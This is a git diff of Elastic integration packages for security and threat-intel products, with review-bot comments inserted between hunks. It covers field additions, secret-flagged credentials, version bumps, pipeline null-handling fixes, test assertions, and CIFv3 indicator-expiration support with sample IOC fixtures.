a/packages/tanium/data_stream/threat_response/fields/fields.yml +++ b/packages/tanium/data_stream/threat_response/fields/fields.yml @@ -219,6 +219,12 @@ - name: pid type: keyword description: Process id. + - name: start_time + type: date + description: Start time. + - name: tanium_unique_id + type: keyword + description: Tanium unique id. - name: user type: group fields: 
@@ -270,6 +276,9 @@ - name: domain type: keyword description: User domain. + - name: group_id + type: keyword + description: User group id. - name: id type: keyword description: User id. @@ -342,6 +351,9 @@ - name: instance_hash type: keyword description: Instance hash. + - name: instance_hash + type: keyword + description: Instance hash. - name: timestamp type: date description: Timestamp. diff --git a/packages/tanium/docs/README.md b/packages/tanium/docs/README.md index 56896a5a602..ef79a834576 100644 --- a/packages/tanium/docs/README.md +++ b/packages/tanium/docs/README.md 
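Review bot: In the `@@ -342,6 +351,9 @@` hunk the added `- name: instance_hash` entry directly follows an existing `- name: instance_hash` with identical `type` and `description`, and indentation is not preserved in this view, so I cannot tell whether the two sit at the same nesting level. If they do, this is a duplicate field definition; if the existing one belongs to `target.file` and the new one to `target`, as the README row `...relevant_actions.target.instance_hash` suggests, the definition is fine. Please confirm the nesting, and consider a description that tells the two apart, e.g. `description: Instance hash of the target.`, rather than repeating `Instance hash.`.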
@@ -1027,6 +1027,8 @@ An example event for `threat_response` looks as following: | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.acting_artifact.process.parent.process.parent.process.handles | Process handles. | keyword | | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.acting_artifact.process.parent.process.parent.process.md5 | MD5 keyword. | keyword | | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.acting_artifact.process.parent.process.parent.process.pid | Process id. | keyword | +| tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.acting_artifact.process.parent.process.parent.process.start_time | Start time. | date | +| tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.acting_artifact.process.parent.process.parent.process.tanium_unique_id | Tanium unique id. | keyword | | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.acting_artifact.process.parent.process.parent.process.user.domain | User domain. | keyword | | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.acting_artifact.process.parent.process.parent.process.user.id | User id. | keyword | | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.acting_artifact.process.parent.process.parent.process.user.name | User name. | keyword | 
@@ -1041,6 +1043,7 @@ An example event for `threat_response` looks as following: | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.acting_artifact.process.start_time | Start time. | date | | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.acting_artifact.process.tanium_unique_id | Tanium unique id. | keyword | | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.acting_artifact.process.user.domain | User domain. | keyword | +| tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.acting_artifact.process.user.group_id | User group id. | keyword | | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.acting_artifact.process.user.id | User id. | keyword | | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.acting_artifact.process.user.name | User name. | keyword | | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.relevant_actions.tanium_recorder_context.event.file_create.path | Path of file. | keyword | 
@@ -1057,6 +1060,7 @@ An example event for `threat_response` looks as following: | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.relevant_actions.target.file.modification_time | Modification time of file. | date | | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.relevant_actions.target.file.path | Path of file. | keyword | | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.relevant_actions.target.file.size_bytes | File size in bytes. | long | +| tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.relevant_actions.target.instance_hash | Instance hash. | keyword | | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.relevant_actions.timestamp | Timestamp. | date | | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.relevant_actions.verb | Verb. | long | | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.intel_intra_ids.id | Array of intel intra id. | keyword | diff --git a/packages/tanium/manifest.yml b/packages/tanium/manifest.yml index 57445539307..adb5a02c460 100644 --- a/packages/tanium/manifest.yml +++ b/packages/tanium/manifest.yml @@ -1,14 +1,14 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: tanium title: Tanium -version: "1.7.1" +version: "1.9.0" description: This Elastic integration collects logs from Tanium with Elastic Agent. type: integration categories: - security conditions: kibana: - version: ^8.3.0 + version: ^8.12.0 elastic: subscription: "basic" screenshots: 
@@ -79,6 +79,7 @@ policy_templates:
 required: false
 show_user: true
 description: First part of access key. This parameter along with the secret_access_key parameter is required if we are not providing shared_credential_file.
+ secret: true
 - name: secret_access_key
 type: password
 title: Secret Access Key
@@ -86,13 +87,15 @@ policy_templates:
 required: false
 show_user: true
 description: Second part of access key. This parameter along with the access_key_id parameter is required if we are not providing shared_credential_file.
+ secret: true
 - name: session_token
- type: text
+ type: password
 title: Session Token
 multi: false
 required: false
 show_user: true
 description: Required when using temporary security credentials.
+ secret: true
 - name: shared_credential_file
 type: text
 title: Shared Credential File
@@ -147,12 +150,14 @@ policy_templates:
 description: The header to check for a specific value specified by `secret.value`.
 required: false
 show_user: false
+ secret: false
 - name: secret_value
 type: password
 title: Secret Value
 description: The secret stored in the header name specified by `secret.header`.
 required: false
 show_user: false
+ secret: true
 - name: ssl
 type: yaml
 title: SSL Configuration
diff --git a/packages/tcp/changelog.yml b/packages/tcp/changelog.yml
index 8b4ac15e092..db580985a94 100644
--- a/packages/tcp/changelog.yml
+++ b/packages/tcp/changelog.yml
@@ -1,3 +1,8 @@
+- version: "1.19.0"
+ changes:
+ - description: Update package-spec to 3.0.3.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9235
 - version: "1.18.1"
 changes:
 - description: Changed owners
diff --git a/packages/tcp/manifest.yml b/packages/tcp/manifest.yml
index 26f19482d89..1dd74864386 100644
--- a/packages/tcp/manifest.yml
+++ b/packages/tcp/manifest.yml
@@ -1,9 +1,9 @@
-format_version: "3.0.0"
+format_version: "3.0.3"
 name: tcp
 title: Custom TCP Logs
 description: Collect raw TCP data from listening TCP port with Elastic Agent.
 type: integration
-version: "1.18.1"
+version: "1.19.0"
 conditions:
 kibana:
 version: "^8.2.1"
diff --git a/packages/tenable_io/changelog.yml b/packages/tenable_io/changelog.yml
index 523e06984e6..8d75ea22301 100644
--- a/packages/tenable_io/changelog.yml
+++ b/packages/tenable_io/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "2.9.0"
+ changes:
+ - description: Set sensitive values as secret.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9128
 - version: "2.8.1"
 changes:
 - description: Changed owners
diff --git a/packages/tenable_io/manifest.yml b/packages/tenable_io/manifest.yml
index df799a253d7..d73d461f732 100644
--- a/packages/tenable_io/manifest.yml
+++ b/packages/tenable_io/manifest.yml
@@ -1,14 +1,14 @@
-format_version: "3.0.0"
+format_version: "3.0.2"
 name: tenable_io
 title: Tenable Vulnerability Management
-version: "2.8.1"
+version: "2.9.0"
 description: Collect logs from Tenable Vulnerability Management with Elastic Agent.
 type: integration
 categories:
 - security
 conditions:
 kibana:
- version: ^8.7.1
+ version: ^8.12.0
 screenshots:
 - src: /img/tenable_io-screenshot.png
 title: Tenable Vulnerability Management dashboard screenshot
@@ -49,6 +49,7 @@ policy_templates:
 multi: false
 required: true
 show_user: true
+ secret: true
 - name: secret_key
 type: password
 title: Secret Key
@@ -56,6 +57,7 @@ policy_templates:
 multi: false
 required: true
 show_user: true
+ secret: true
 - name: proxy_url
 type: text
 title: Proxy URL
diff --git a/packages/tenable_sc/changelog.yml b/packages/tenable_sc/changelog.yml
index 2007a41f1e5..6286363cfdd 100644
--- a/packages/tenable_sc/changelog.yml
+++ b/packages/tenable_sc/changelog.yml
@@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.21.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9128 +- version: "1.20.2" + changes: + - description: Clean up null handling + type: bugfix + link: https://github.com/elastic/integrations/pull/9152 - version: "1.20.1" changes: - description: Changed owners diff --git a/packages/tenable_sc/data_stream/asset/elasticsearch/ingest_pipeline/default.yml b/packages/tenable_sc/data_stream/asset/elasticsearch/ingest_pipeline/default.yml index fd0190b27d4..345b3e1992d 100644 --- a/packages/tenable_sc/data_stream/asset/elasticsearch/ingest_pipeline/default.yml +++ b/packages/tenable_sc/data_stream/asset/elasticsearch/ingest_pipeline/default.yml @@ -187,7 +187,7 @@ processors: source: | def domain = ''; def nameArray = ctx.json.dnsName.toString().splitOnToken('.'); - if (nameArray?.length > 0) { + if (nameArray?.length != null && nameArray.length > 0) { for (int i = 1; i < nameArray.length; i++) { domain += nameArray[i] + (i < nameArray.length - 1 ? '.' : ''); } @@ -283,7 +283,7 @@ processors: ignore_missing: true - remove: field: event.original - if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + if: ctx.tags?.contains('preserve_original_event') != true ignore_failure: true ignore_missing: true on_failure: diff --git a/packages/tenable_sc/data_stream/plugin/elasticsearch/ingest_pipeline/default.yml b/packages/tenable_sc/data_stream/plugin/elasticsearch/ingest_pipeline/default.yml index 08b8ba2e28b..f8b8eb8e0c8 100644 --- a/packages/tenable_sc/data_stream/plugin/elasticsearch/ingest_pipeline/default.yml +++ b/packages/tenable_sc/data_stream/plugin/elasticsearch/ingest_pipeline/default.yml 
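Review bot: The new guard `nameArray?.length != null && nameArray.length > 0` in the asset pipeline hunk does not cover the line above it: `ctx.json.dnsName.toString()` still dereferences `dnsName` without a null-safe operator, so a record with no `dnsName` throws before the guard is reached, unless the processor's `if` condition (outside the hunk) already excludes that case. If it does not, `def nameArray = ctx.json?.dnsName?.toString()?.splitOnToken('.');` moves the null handling to where the value is read, and the `!= null` check on the array then does real work instead of testing a value `splitOnToken` never returns as null. The enclosing `script` processor starts and ends outside the hunk.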
@@ -405,7 +405,7 @@ processors: ignore_missing: true - remove: field: event.original - if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + if: ctx.tags?.contains('preserve_original_event') != true ignore_failure: true ignore_missing: true on_failure: diff --git a/packages/tenable_sc/data_stream/vulnerability/elasticsearch/ingest_pipeline/default.yml b/packages/tenable_sc/data_stream/vulnerability/elasticsearch/ingest_pipeline/default.yml index 2085e7901ef..113b67b065d 100644 --- a/packages/tenable_sc/data_stream/vulnerability/elasticsearch/ingest_pipeline/default.yml +++ b/packages/tenable_sc/data_stream/vulnerability/elasticsearch/ingest_pipeline/default.yml @@ -14,7 +14,7 @@ processors: target_field: json ignore_failure: true - drop: - if: ctx.json?.response?.returnedRecords != null && ctx.json?.response?.returnedRecords == 0 + if: ctx.json?.response?.returnedRecords == 0 - fingerprint: fields: - json.lastSeen @@ -83,7 +83,7 @@ processors: - set: field: vulnerability.score.version value: '3.0' - if: ctx.json?.cvssV3BaseScore != '' || ctx.json?.cvssV3TemporalScore != '' + if: def empty = [null, '']; !empty.contains(ctx.json?.cvssV3BaseScore) || !empty.contains(ctx.json?.cvssV3TemporalScore) ignore_failure: true - split: field: json.seeAlso @@ -111,7 +111,7 @@ processors: - set: field: vulnerability.enumeration value: 'CVE' - if: ctx.json?.cve != '' + if: "![null, ''].contains(ctx.json?.cve)" ignore_failure: true - split: field: json.cve @@ -120,7 +120,7 @@ processors: - set: field: vulnerability.classification value: 'CVSS' - if: ctx.json?.cvssV3BaseScore != '' || ctx.json?.cvssV3TemporalScore != '' + if: "![null, ''].contains(ctx.json?.cvssV3BaseScore) || ![null, ''].contains(ctx.json?.cvssV3TemporalScore)" ignore_failure: true - rename: field: json.cvssV3BaseScore 
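Review bot: The vulnerability pipeline now spells the same "non-null and non-empty" predicate three different ways: `def empty = [null, '']; !empty.contains(...)` in the `@@ -83` hunk, `"![null, ''].contains(ctx.json?.cve)"` in the `@@ -111` hunk, and `"![null, ''].contains(...) || ![null, ''].contains(...)"` in the `@@ -120` hunk, the last being the same condition as the first on the same two fields. Using one form for all three lets a reader see at a glance that `vulnerability.score.version` and `vulnerability.classification` are set under identical conditions; the quoted list-literal form already used at `@@ -111` and `@@ -120` is the shortest and needs no local variable.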
@@ -583,7 +583,7 @@ processors:
 ignore_missing: true
 - remove:
 field: event.original
- if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))
+ if: ctx.tags?.contains('preserve_original_event') != true
 ignore_failure: true
 ignore_missing: true
 on_failure:
diff --git a/packages/tenable_sc/manifest.yml b/packages/tenable_sc/manifest.yml
index 8c169bd9f53..52426e572d5 100644
--- a/packages/tenable_sc/manifest.yml
+++ b/packages/tenable_sc/manifest.yml
@@ -1,8 +1,8 @@
-format_version: "3.0.0"
+format_version: "3.0.2"
 name: tenable_sc
 title: Tenable.sc
 # The version must be updated in the pipeline as well. Until elastic/kibana#121310 is implemented we will have to manually sync these.
-version: "1.20.1"
+version: "1.21.0"
 description: |
 Collect logs from Tenable.sc with Elastic Agent.
 type: integration
@@ -10,7 +10,7 @@ categories:
 - security
 conditions:
 kibana:
- version: ^8.7.1
+ version: ^8.12.0
 screenshots:
 - src: /img/tenable_sc-screenshot.png
 title: Tenable.sc vulnerability dashboard screenshot
@@ -54,11 +54,13 @@ policy_templates:
 title: Access Key
 description: Access key for the Tenable.sc API.
 required: true
+ secret: true
 - name: secret_key
 type: password
 title: Secret Key
 description: Secret key for the Tenable.sc API.
 required: true
+ secret: true
 - name: batch_size
 type: text
 title: Batch Size
diff --git a/packages/thycotic_ss/_dev/deploy/docker/docker-compose.yml b/packages/thycotic_ss/_dev/deploy/docker/docker-compose.yml
index 930861d7de7..911af84a465 100644
--- a/packages/thycotic_ss/_dev/deploy/docker/docker-compose.yml
+++ b/packages/thycotic_ss/_dev/deploy/docker/docker-compose.yml
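Review bot: The comment kept in the manifest hunk says the version must also be updated in the pipeline, and the hunk bumps `version` to `"1.21.0"`, but none of the three tenable_sc ingest-pipeline hunks in this diff touch a version value. If a pipeline carries the package version somewhere outside these hunks, confirm it was bumped to match; otherwise the manifest and pipeline drift in exactly the way the comment warns about.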
@@ -7,14 +7,12 @@ services: - ${SERVICE_LOGS_DIR}:/var/log command: /bin/sh -c "cp /sample_logs/* /var/log/" thycotic-ss-log-udp: - image: akroh/stream:v0.2.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9571 -p=udp /sample_logs/thycotic-ss-*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9571 -p=udp /sample_logs/thycotic-ss-*.log thycotic-ss-log-tcp: - image: akroh/stream:v0.2.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9571 -p=tcp /sample_logs/thycotic-ss-*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9571 -p=tcp /sample_logs/thycotic-ss-*.log diff --git a/packages/thycotic_ss/changelog.yml b/packages/thycotic_ss/changelog.yml index 3d9e7692082..62c79def1ad 100644 --- a/packages/thycotic_ss/changelog.yml +++ b/packages/thycotic_ss/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.7.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9404 - version: "1.6.2" changes: - description: Changed owners diff --git a/packages/thycotic_ss/data_stream/logs/_dev/test/system/test-logfile-config.yml b/packages/thycotic_ss/data_stream/logs/_dev/test/system/test-logfile-config.yml index 9f1ca6a8b5c..73646ab20c6 100644 --- a/packages/thycotic_ss/data_stream/logs/_dev/test/system/test-logfile-config.yml +++ b/packages/thycotic_ss/data_stream/logs/_dev/test/system/test-logfile-config.yml @@ -4,3 +4,5 @@ data_stream: vars: paths: - "{{SERVICE_LOGS_DIR}}/thycotic-ss-*.log" +assert: + hit_count: 1 
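Review bot: The `1.7.0` changelog entry added with this change describes only the manifest format bump, but this hunk also swaps the `akroh/stream:v0.2.0` log-replay image for `docker.elastic.co/observability/stream:v0.15.0` (dropping the `/bin/bash -c` entrypoint) and the three system-test configs gain `hit_count` assertions; none of that is visible to someone reading the changelog. Consider widening the description, e.g. `description: Update manifest format version to v3.0.3, switch system tests to the observability stream image and assert hit counts.`. The image is referenced by tag rather than digest, which matches the rest of the repository but means the test fixture is not reproducible bit-for-bit; only worth revisiting if the repository adopts digest pinning.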
diff --git a/packages/thycotic_ss/data_stream/logs/_dev/test/system/test-tcp-config.yml b/packages/thycotic_ss/data_stream/logs/_dev/test/system/test-tcp-config.yml index e6486d4c3a9..07efb8f1d0b 100644 --- a/packages/thycotic_ss/data_stream/logs/_dev/test/system/test-tcp-config.yml +++ b/packages/thycotic_ss/data_stream/logs/_dev/test/system/test-tcp-config.yml @@ -5,3 +5,5 @@ data_stream: vars: tcp_host: 0.0.0.0 tcp_port: 9571 +assert: + hit_count: 1 diff --git a/packages/thycotic_ss/data_stream/logs/_dev/test/system/test-udp-config.yml b/packages/thycotic_ss/data_stream/logs/_dev/test/system/test-udp-config.yml index 2fa92d630c9..9692279a844 100644 --- a/packages/thycotic_ss/data_stream/logs/_dev/test/system/test-udp-config.yml +++ b/packages/thycotic_ss/data_stream/logs/_dev/test/system/test-udp-config.yml @@ -5,3 +5,5 @@ data_stream: vars: udp_host: 0.0.0.0 udp_port: 9571 +assert: + hit_count: 1 diff --git a/packages/thycotic_ss/manifest.yml b/packages/thycotic_ss/manifest.yml index 4bab0672a3f..e28026f8f65 100644 --- a/packages/thycotic_ss/manifest.yml +++ b/packages/thycotic_ss/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: thycotic_ss title: "Thycotic Secret Server" -version: "1.6.2" +version: "1.7.0" source: license: "Elastic-2.0" description: "Thycotic Secret Server logs" diff --git a/packages/ti_abusech/changelog.yml b/packages/ti_abusech/changelog.yml index cca06edaeff..d629341c34c 100644 --- a/packages/ti_abusech/changelog.yml +++ b/packages/ti_abusech/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.25.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9404 - version: "1.24.1" changes: - description: Changed owners 
diff --git a/packages/ti_abusech/data_stream/malware/_dev/test/system/test-default-config.yml b/packages/ti_abusech/data_stream/malware/_dev/test/system/test-default-config.yml index 91dd3c58da1..03a73c985d5 100644 --- a/packages/ti_abusech/data_stream/malware/_dev/test/system/test-default-config.yml +++ b/packages/ti_abusech/data_stream/malware/_dev/test/system/test-default-config.yml @@ -8,3 +8,5 @@ data_stream: url: http://{{Hostname}}:{{Port}}/v1/payloads/recent/ preserve_original_event: true enable_request_tracer: true +assert: + hit_count: 2 diff --git a/packages/ti_abusech/data_stream/malwarebazaar/_dev/test/system/test-default-config.yml b/packages/ti_abusech/data_stream/malwarebazaar/_dev/test/system/test-default-config.yml index 1fc9c05fe2c..f829c29833f 100644 --- a/packages/ti_abusech/data_stream/malwarebazaar/_dev/test/system/test-default-config.yml +++ b/packages/ti_abusech/data_stream/malwarebazaar/_dev/test/system/test-default-config.yml @@ -5,3 +5,5 @@ data_stream: url: http://{{Hostname}}:{{Port}}/api/v1/ preserve_original_event: true enable_request_tracer: true +assert: + hit_count: 2 diff --git a/packages/ti_abusech/data_stream/threatfox/_dev/test/system/test-default-config.yml b/packages/ti_abusech/data_stream/threatfox/_dev/test/system/test-default-config.yml index bd34fcf8287..028b4eed20d 100644 --- a/packages/ti_abusech/data_stream/threatfox/_dev/test/system/test-default-config.yml +++ b/packages/ti_abusech/data_stream/threatfox/_dev/test/system/test-default-config.yml @@ -5,3 +5,5 @@ data_stream: url: http://{{Hostname}}:{{Port}}/api/v1/ preserve_original_event: true enable_request_tracer: true +assert: + hit_count: 2 diff --git a/packages/ti_abusech/data_stream/url/_dev/test/system/test-default-config.yml b/packages/ti_abusech/data_stream/url/_dev/test/system/test-default-config.yml index e180c3addda..22f51ba3a62 100644 --- a/packages/ti_abusech/data_stream/url/_dev/test/system/test-default-config.yml 
+++ b/packages/ti_abusech/data_stream/url/_dev/test/system/test-default-config.yml @@ -5,3 +5,5 @@ data_stream: url: http://{{Hostname}}:{{Port}}/v1/urls/recent/ preserve_original_event: true enable_request_tracer: true +assert: + hit_count: 2 diff --git a/packages/ti_abusech/manifest.yml b/packages/ti_abusech/manifest.yml index b29ea1a87d4..3e665fe480f 100644 --- a/packages/ti_abusech/manifest.yml +++ b/packages/ti_abusech/manifest.yml @@ -1,9 +1,9 @@ name: ti_abusech title: AbuseCH -version: "1.24.1" +version: "1.25.0" description: Ingest threat intelligence indicators from URL Haus, Malware Bazaar, and Threat Fox feeds with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.3" categories: ["security", "threat_intel"] conditions: kibana: diff --git a/packages/ti_anomali/changelog.yml b/packages/ti_anomali/changelog.yml index fd7b9da65dc..89ee6b1ba53 100644 --- a/packages/ti_anomali/changelog.yml +++ b/packages/ti_anomali/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.20.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 - version: "1.19.2" changes: - description: Changed owners diff --git a/packages/ti_anomali/data_stream/threatstream/manifest.yml b/packages/ti_anomali/data_stream/threatstream/manifest.yml index c1cd9f11ce2..b5521752134 100644 --- a/packages/ti_anomali/data_stream/threatstream/manifest.yml +++ b/packages/ti_anomali/data_stream/threatstream/manifest.yml @@ -36,12 +36,13 @@ streams: show_user: false default: application/x-ndjson - name: secret - type: text + type: password title: HMAC secret key description: Secret key to authenticate requests from the SDK. multi: false required: false show_user: true + secret: true - name: ssl type: yaml title: TLS diff --git a/packages/ti_anomali/manifest.yml b/packages/ti_anomali/manifest.yml index 435bd796e58..9425108585a 100644 --- a/packages/ti_anomali/manifest.yml 
+++ b/packages/ti_anomali/manifest.yml @@ -1,13 +1,13 @@ name: ti_anomali title: Anomali -version: "1.19.2" +version: "1.20.0" description: Ingest threat intelligence indicators from Anomali with Elastic Agent. type: integration -format_version: 3.0.0 +format_version: 3.0.2 categories: ["security", "threat_intel"] conditions: kibana: - version: ^8.8.0 + version: ^8.12.0 icons: - src: /img/anomali.svg title: Anomali diff --git a/packages/ti_cif3/_dev/build/docs/README.md b/packages/ti_cif3/_dev/build/docs/README.md index 06f1cb5a417..6843f6eaf06 100644 --- a/packages/ti_cif3/_dev/build/docs/README.md +++ b/packages/ti_cif3/_dev/build/docs/README.md 
@@ -2,6 +2,21 @@ This integration connects with the [REST API from the running CIFv3 instance](https://github.com/csirtgadgets/bearded-avenger-deploymentkit/wiki/REST-API) to retrieve indicators. +## Expiration of Indicators of Compromise (IOCs) +Indicators are expired after a certain duration. An [Elastic Transform](https://www.elastic.co/guide/en/elasticsearch/reference/current/transforms.html) is created for a source index to allow only active indicators to be available to the end users. The transform creates a destination index named `logs-ti_cif3_latest.dest_feed*` which only contains active and unexpired indicators. Destination indices are aliased to `logs-ti_cif3_latest.feed`. The indicator match rules and dashboards are updated to show only active indicators. + +| Indicator Type | Indicator Expiration Duration | +|:------------------|:------------------------------------------------| +| `ipv4-addr` | `45d` | +| `ipv6-addr` | `45d` | +| `domain-name` | `90d` | +| `url` | `365d` | +| `file` | `365d` | +| All Other Types | Derived from `IOC Expiration Duration` setting | + +### ILM Policy +To facilitate IOC expiration, source datastream-backed indices `.ds-logs-ti_cif3.feed-*` are allowed to contain duplicates. ILM policy `logs-ti_cif3.feed-default_policy` is added to these source indices so it doesn't lead to unbounded growth. This means data in these source indices will be deleted after `5 days` from ingested date. + ## Data Streams ### Feed diff --git a/packages/ti_cif3/_dev/deploy/docker/files/config.yml b/packages/ti_cif3/_dev/deploy/docker/files/config.yml index 16a152b8de6..c33382ac9a3 100644 --- a/packages/ti_cif3/_dev/deploy/docker/files/config.yml +++ b/packages/ti_cif3/_dev/deploy/docker/files/config.yml 
@@ -152,10 +152,49 @@ rules: "protocol": "tcp", "asn": 135905, "asn_desc": "vietnam posts and telecommunications group", - "firsttime": "2022-07-19T09:30:19.000000Z", - "reporttime": "2022-07-20T00:19:11.521288Z", - "lasttime": "2022-07-19T09:30:19.000000Z", + "firsttime": "2024-04-01T09:30:19.000000Z", + "reporttime": "2024-04-02T00:19:11.521288Z", + "lasttime": "2024-04-03T09:30:19.000000Z", "indicator_ipv4": "103.133.105.50" + }, + { + "indicator": "baddom.madeup.local", + "itype": "fqdn", + "tlp": "white", + "provider": "sslbl.abuse.ch", + "group": [ + "everyone" + ], + "count": 1, + "tags": [ + "botnet" + ], + "confidence": 80, + "uuid": "be240898-1443-4d7e-a78a-1daed210c182", + "application": "https", + "reference": "https://sslbl.abuse.ch/blacklist/sslipblacklist.csv", + "firsttime": "2024-03-20T20:25:53.000000Z", + "reporttime": "2024-03-21T20:33:26.585967Z", + "lasttime": "2024-03-20T20:25:53.000000Z" + }, + { + "indicator": "http://www.doordelivery.life/km37", + "itype": "url", + "tlp": "white", + "provider": "sslbl.abuse.ch", + "group": [ + "everyone" + ], + "count": 1, + "tags": [ + "botnet" + ], + "confidence": 70, + "uuid": "bf340888-1343-4e7d-a78a-1daed210c182", + "reference": "https://sslbl.abuse.ch/blacklist/sslipblacklist.csv", + "firsttime": "2023-07-20T20:25:53.000000Z", + "reporttime": "2023-07-21T20:33:26.585967Z", + "lasttime": "2023-07-20T20:25:53.000000Z" } ] } diff --git a/packages/ti_cif3/changelog.yml b/packages/ti_cif3/changelog.yml index f978477eb3a..c3e7453cd8a 100644 --- a/packages/ti_cif3/changelog.yml +++ b/packages/ti_cif3/changelog.yml 
@@ -1,4 +1,19 @@ # newer versions go on top +- version: "1.12.0" + changes: + - description: Support for IOC expiration + type: enhancement + link: https://github.com/elastic/integrations/pull/9550 +- version: "1.11.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 +- version: "1.10.2" + changes: + - description: Clean up null handling + type: bugfix + link: https://github.com/elastic/integrations/pull/9148 - version: "1.10.1" changes: - description: Changed owners diff --git a/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-no-preserve-ndjson.log-config.yml b/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-no-preserve-ndjson.log-config.yml index c41ee36923e..ed40c141690 100644 --- a/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-no-preserve-ndjson.log-config.yml +++ b/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-no-preserve-ndjson.log-config.yml @@ -1,2 +1,4 @@ fields: tags: ~ + _conf: + ioc_expiration_duration: 5d diff --git a/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-no-preserve-ndjson.log-expected.json b/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-no-preserve-ndjson.log-expected.json index 1999325a749..f1c5524101f 100644 --- a/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-no-preserve-ndjson.log-expected.json +++ b/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-no-preserve-ndjson.log-expected.json @@ -2,6 +2,9 @@ "expected": [ { "cif3": { + "deleted_at": "2022-09-02T08:35:05.971Z", + "expiration_duration": "45d", + "indicator": "89.160.20.156", "itype": "ipv4", "rdata": "http://208.67.106.111/theme/inc/e26dbe0dcc481e.php", "uuid": "3fbdd654-b2b0-498c-8e20-ef87bce73672" 
@@ -32,13 +35,14 @@ "indicator": { "confidence": "High", "description": "agent tesla", - "first_seen": "2022-07-19T07:40:41.000000Z", + "first_seen": "2022-07-19T07:40:41.000Z", "ip": "89.160.20.156", - "last_seen": "2022-07-19T08:35:05.971696Z", + "last_seen": "2022-07-19T08:35:05.971Z", "marking": { "tlp": "WHITE" }, "modified_at": "2022-07-19T08:35:05.971696Z", + "name": "89.160.20.156", "provider": "threatfox.abuse.ch", "reference": "https://threatfox.abuse.ch/ioc/838651/", "sightings": 1, diff --git a/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-sample-ndjson.log-config.yml b/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-sample-ndjson.log-config.yml index 4da22641654..2c7449ef783 100644 --- a/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-sample-ndjson.log-config.yml +++ b/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-sample-ndjson.log-config.yml @@ -1,3 +1,5 @@ fields: tags: - preserve_original_event + _conf: + ioc_expiration_duration: 5d diff --git a/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-sample-ndjson.log-expected.json b/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-sample-ndjson.log-expected.json index 83ed2b4f1d7..3cab2556497 100644 --- a/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-sample-ndjson.log-expected.json +++ b/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-sample-ndjson.log-expected.json @@ -2,6 +2,9 @@ "expected": [ { "cif3": { + "deleted_at": "2022-09-02T08:35:05.971Z", + "expiration_duration": "45d", + "indicator": "89.160.20.156", "itype": "ipv4", "rdata": 